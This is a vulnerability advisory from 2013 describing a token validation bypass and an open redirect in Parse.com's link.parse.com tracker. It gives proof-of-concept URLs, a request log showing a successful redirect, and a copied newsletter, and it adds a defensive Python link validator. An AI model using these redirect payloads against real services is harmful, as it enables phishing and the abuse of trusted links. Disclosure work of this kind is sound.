Facebook Bug Bounty #8 - Multiple Vulnerabilities

2013-07-06T00:00:00
ID VULNERLAB:993
Type vulnerlab
Reporter Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)
Modified 2013-07-06T00:00:00

Description

                                        
Document Title:
===============
Facebook Bug Bounty #8 - Multiple Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=993


Release Date:
=============
2013-07-06


Vulnerability Laboratory ID (VL-ID):
====================================
993


Common Vulnerability Scoring System:
====================================
4.3


Product & Service Introduction:
===============================
Facebook's Parse is the cloud app platform for iOS, Android, JavaScript, Windows 8, Windows Phone 8, and OS X. With Parse, you can 
add a scalable and powerful backend in minutes and launch a full-featured app in record time without ever worrying about server management. 
We offer push notifications, social integration, data storage, and the ability to add rich custom logic to your app’s backend with Cloud Code.

Parse allows your team to focus more on creating a great user experience and forget server maintenance and complex infrastructure. 
Instantly add push notifications, data storage, social integration, and more the moment you integrate a Parse SDK into your app. Connect 
your users via traditional logins or third party social networks, like Facebook and Twitter, with just a few lines of code. We take care 
of linking accounts across networks, resetting passwords, and keeping everything safe and secure so that you don’t have.

Parse simplifies the difficult task of adding real time push notifications to an application. Create, send, and target highly effective 
push notifications via the web-based push console, REST API, or client SDKs. With our millions and millions of notifications sent 
every day, you never have to worry about scaling. Parse always delivers.

Vendor Page:    https://www.facebook.com
Homepage: 	https://www.parse.com


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered 2 different web vulnerabilities in the official Facebook Parse Service Web Application.


Vulnerability Disclosure Timeline:
==================================
2013-07-07:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Facebook
Product: Parse.com - Web Application 2013 Q2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
1.1
A token protection filter bypass vulnerability is detected in the official Facebook Parse Online Service Web Application.
The vulnerability allows remote attackers to bypass the unique id request for further exploitation.

The vulnerability is located in the insecurely validated mkt_tok session parameter, which is bound to the requested 
URL as a link token. The attacker can simply change the token to an empty value and later request other URLs. The token 
never expires, but it is uniquely generated for each person. Also important for successful exploitation is that 
requests do not require a valid mid. The underlying problem is that the included token and id are not fully validated 
on the request. Note that the parameter `t` is required with an integer value in the request for successful exploitation.

Exploitation of the vulnerability requires no privileged Facebook parse.com application user account and only low 
user interaction. Successful exploitation results in the bypass of the unique link token validation.

Vulnerable Service(s):
				[+] Facebook - Parse.com - 2013Q2 

Vulnerable Parameter(s):
				[+] mkt_tok


1.2
An open/unauthorized redirect web vulnerability is detected in the official Facebook Parse Online Service Web Application.
The vulnerability allows remote attackers to prepare client-side redirects to external or otherwise unauthorized destinations.

The vulnerability is located in the URL that follows the mid parameter after the `&&&` separator. Remote attackers can 
replace the internal URL after the `&&&` with an external one within the same session to redirect on the client side.

Exploitation of the redirect web vulnerability requires low or medium user interaction and no application user account. 
Successful exploitation of the vulnerability results in open or unauthorized redirects to external websites via client-side requests.

Vulnerable Service(s):
				[+] Facebook - Parse.com - 2013Q2 

Vulnerable Parameter(s):
				[+] mid > &&& [>


Proof of Concept (PoC):
=======================
The session and redirect vulnerabilities can be exploited by remote attackers without a privileged application user account and 
with low or medium user interaction. For demonstration or to reproduce ...


Standard Request:
http://link.parse.com/trk?t=2&mid=NzEzLVlGUS0wODQ6NzE4OjExNDY6NDY2OjA6MTExOTo3OjIwODQ2NDU6YWRtaW5AdnVsbmVyYW
JpbGl0eS1sYWIuY29t&&&http://blog.parse.com/2013/06/27/you-built-a-beautiful-mobile-app-but-didnt-get-any-installs-now-what/?
mkt_tok=3RkMMJWWfF9wsRonuqjPZKXonjHpfsX66%2BQpX6OzlMI%2F0ER3fOvrPUfGjI4ATcNrI%2BSLDwEYGJlv6SgFTbHGMblmy7gNUxU%3D


Example:
http://link.parse.com/trk?t=[INTEGER]&mid=[EMPTY NOT RECOGNIZED FOR REQUEST]&&&http://[EXTERNAL URL AS SOURCE][-NO MKT TOKEN]%3D

PoC:
http://link.parse.com/trk?t=2&mid=&&&http://www.vulnerability-lab.com[-NO MKT TOKEN]

- External open redirect possible
- External open file load possible
- Token and request protection does not accept the request with the given values, but the same request without the token works perfectly



--- Request Session Log ---
15:20:35.121[327ms][total 370ms]
Status: 200[OK]

GET http://link.parse.com/trk?t=2&mid=&&&http://www.vulnerability-lab.com/
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[-1] Mime Type[text/html]

Request Headers:
Host[link.parse.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Connection[keep-alive]

Response Headers:
Date[Sat, 29 Jun 2013 13:20:35 GMT]
Server[Apache]
Connection[close]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Transfer-Encoding[chunked]
Content-Type[text/html]


15:20:35.511[321ms][total 650ms]
Status: 200[OK]

GET http://www.vulnerability-lab.com/
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[64649] Mime Type[text/html]

Request Headers:
Host[www.vulnerability-lab.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://link.parse.com/trk?t=2&mid=&&&http://www.vulnerability-lab.com/]
Cookie[PHPSESSID=2e0a11f779ab0adc8ba23856280b10c0]
Connection[keep-alive]

Response Headers:
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Content-Type[text/html]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Server[Microsoft-IIS/7.0]
X-Powered-By[ASP.NET]
X-Powered-By-Plesk[PleskWin]
Date[Sat, 29 Jun 2013 13:20:35 GMT]
Content-Length[64649]




--- Copy of Email `Get $100 in Facebook Mobile App Install Ads, View the Parse and IDEO Webcast Recap, and More` ---

Sender: community@parse.com

<tr ><td width="30"> </td>
<td style="background-color:#f0f0f0; color:#45555f; font-family:Helvetica,Tahoma; font-size:12px; line-height:18px; 
vertical-align:top; " bgcolor="#F0F0F0" width="580" ><br>
<div class="mktEditable" id="main_text" style="padding:20px; " ><p><a href=
"http://link.parse.com/trk?t=2&mid=NzEzLVlGUS0wODQ6NzE4OjExNDY6NDY2OjA6MTExOTo3OjIwODQ2NDU6YWRtaW5AdnVsbmVyYWJpbGl
0eS1sYWIuY29t&&&http://blog.parse.com/2013/06/27/you-built-a-beautiful-mobile-app-but-didnt-get-any-installs-now-what/?
mkt_tok=3RkMMJWWfF9wsRonuqjPZKXonjHpfsX66%2BQpX6OzlMI%2F0ER3fOvrPUfGjI4ATcNrI%2BSLDwEYGJlv6SgFTbHGMblmy7gNUxU%3D"
><img src="http://go.parse.com/rs/parse/images/Newsletter.jpg" alt="Image of Facebook giftcard with $100 on it. Caption: 
We got you something nice." width="540" height="260" /></a></p>
<p style="color: #45555f; font-family: Helvetica, Tahoma; font-size: 12px; font-weight: normal; line-height: 18px;">
<span style="font-size: 14px;"><a style="font-size: 14px;" href=
"http://link.parse.com/trk?t=2&mid=NzEzLVlGUS0wODQ6NzE4OjExNDY6NDY2OjA6MTExOTo3OjIwODQ2NDU6YWRtaW5AdnVsbmVyYWJpbGl
0eS1sYWIuY29t&&&http://blog.parse.com/2013/06/27/you-built-a-beautiful-mobile-app-but-didnt-get-any-installs-now-what/?
mkt_tok=3RkMMJWWfF9wsRonuqjPZKXonjHpfsX66%2BQpX6OzlMI%2F0ER3fOvrPUfGjI4ATcNrI%2BSLDwEYGJlv6SgFTbHGMblmy7gNUxU%3D"
>You Built a Beautiful Mobile App But Didn't Get Any Installs. Now What? Get $100 of Free Facebook Ad Credit to Increase 
Installs</a></span><span style="font-size: 14px;"><a style="font-size: 14px;" href=
"http://link.parse.com/trk?t=2&mid=NzEzLVlGUS0wODQ6NzE4OjExNDY6NDY2OjA6MTExOTo3OjIwODQ2NDU6YWRtaW5AdnVsbmVyYWJpbGl
0eS1sYWIuY29t&&&http://blog.parse.com/2013/06/27/you-built-a-beautiful-mobile-app-but-didnt-get-any-installs-now-what/?
mkt_tok=3RkMMJWWfF9wsRonuqjPZKXonjHpfsX66%2BQpX6OzlMI%2F0ER3fOvrPUfGjI4ATcNrI%2BSLDwEYGJlv6SgFTbHGMblmy7gNUxU%3D"
><br /></a></span></p>
<p>Facebook mobile app install ads are a new, effective way to grow your Parse-powered app. They enable you to: launch your 
ad with an easy to use ads tool, target the right people (in their news feeds), and measure & optimize performance. 
Login <a href=
"http://link.parse.com/trkt=2&mid=NzEzLVlGUS0wODQ6NzE4OjExNDY6NDY2OjA6MTExOTo3OjIwODQ2NDU6YWRtaW5AdnVsbmVyYWJpbGl
0eS1sYWIuY29t&&&https://parse.com/products/facebook_credits?mkt_tok=3RkMMJWWfF9wsRonuqjPZKXonjHpfsX66%2BQpX6OzlMI
%2F0ER3fOvrPUfGjI4ATcNrI%2BSLDwEYGJlv6SgFTbHGMblmy7gNUxU%3D"
>here</a> with your Parse account credentials to claim $100 in free mobile app install ad credits from Facebook and click <a href=
"http://link.parse.com/trk?t=2&mid=NzEzLVlGUS0wODQ6NzE4OjExNDY6NDY2OjA6MTExOTo3OjIwODQ2NDU6YWRtaW5AdnVsbmVyYWJpbGl0eS1sYWIuY29t&&&https://developers.
facebook.com/docs/tutorials/mobile-app-ads/?mkt_tok=3RkMMJWWfF9wsRonuqjPZKXonjHpfsX66%2BQpX6OzlMI%2F0ER3fOvrPUfGjI4ATcNrI%2
BSLDwEYGJlv6SgFTbHGMblmy7gNUxU%3D"
>here</a> to learn more about mobile app install ads.</p>



Solution - Fix & Patch:
=======================
1.1
The session token validation needs to be extended with a secure validation that performs separate checks on the included id and token.

1.2
The redirect vulnerability can be patched by restricting the URL that is supplied after `&&&` in the mid parameter request.
Another possibility is a white-list or a second exception handling as filter protection to prevent open/unauthorized redirects.
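Added example (not Parse's code): a minimal validator for the /trk link format shown in the PoC that applies the separate checks suggested above for both issue 1.1 (empty mid, missing or unbound mkt_tok) and issue 1.2 (arbitrary destination after `&&&`). The allow-list of destination hosts, the HMAC key and the HMAC-based binding of mkt_tok to mid are assumptions; the page does not describe Parse's real token scheme.

```python
import hashlib
import hmac
from urllib.parse import parse_qs, urlsplit

# Separator between the tracker's own query string and the destination URL, as seen in the PoC links.
SEP = "&&&"

# Hosts a tracking link may forward the browser to (constructed allow-list for this example).
ALLOWED_HOSTS = {"blog.parse.com", "parse.com", "www.parse.com", "developers.facebook.com"}

# Server-side key that binds mkt_tok to mid. Hypothetical: the advisory does not describe the real scheme.
TOKEN_KEY = b"constructed-demo-key"


def expected_token(mid: str) -> str:
    """Token the server would have issued for this mid (hypothetical HMAC-SHA256 binding)."""
    return hmac.new(TOKEN_KEY, mid.encode(), hashlib.sha256).hexdigest()


def parse_trk(url: str):
    """Split a /trk link into (t, mid, destination). Returns None if no &&& destination is present."""
    query = urlsplit(url).query
    if SEP not in query:
        return None
    tracker_qs, dest = query.split(SEP, 1)
    params = parse_qs(tracker_qs, keep_blank_values=True)
    return params.get("t", [""])[0], params.get("mid", [""])[0], dest


def validate(url: str):
    """Return (True, destination) or (False, reason), running each check separately."""
    parsed = parse_trk(url)
    if parsed is None:
        return False, "no &&& destination"
    t, mid, dest = parsed
    if not t.isdigit():
        return False, "t must be an integer"
    if not mid:  # issue 1.1: the PoC shows an empty mid being accepted
        return False, "empty mid"
    dest_parts = urlsplit(dest)
    if dest_parts.scheme not in ("http", "https") or dest_parts.hostname not in ALLOWED_HOSTS:
        return False, "destination host not allow-listed"  # issue 1.2: open redirect
    tok = parse_qs(dest_parts.query, keep_blank_values=True).get("mkt_tok", [""])[0]
    if not tok or not hmac.compare_digest(tok.encode(), expected_token(mid).encode()):
        return False, "mkt_tok missing or not bound to mid"  # the PoC link worked without any mkt_tok
    return True, dest
```

Feeding the PoC link from above into validate() fails on the empty mid check; a link with a valid mid but an external destination fails on the allow-list check.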


Security Risk:
==============
1.1
The security risk of the session token protection bypass is estimated as medium(+).

1.2
The security risk of the open redirect web vulnerability is estimated as medium(-).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team]  -    Benjamin Kunz Mejri (bkm@evolution-sec.com)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and fitness for a particular purpose. Vulnerability-Lab 
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material, contact admin@vulnerability-lab.com or support@vulnerability-lab.com to get permission.

Copyright © 2013 | Vulnerability Laboratory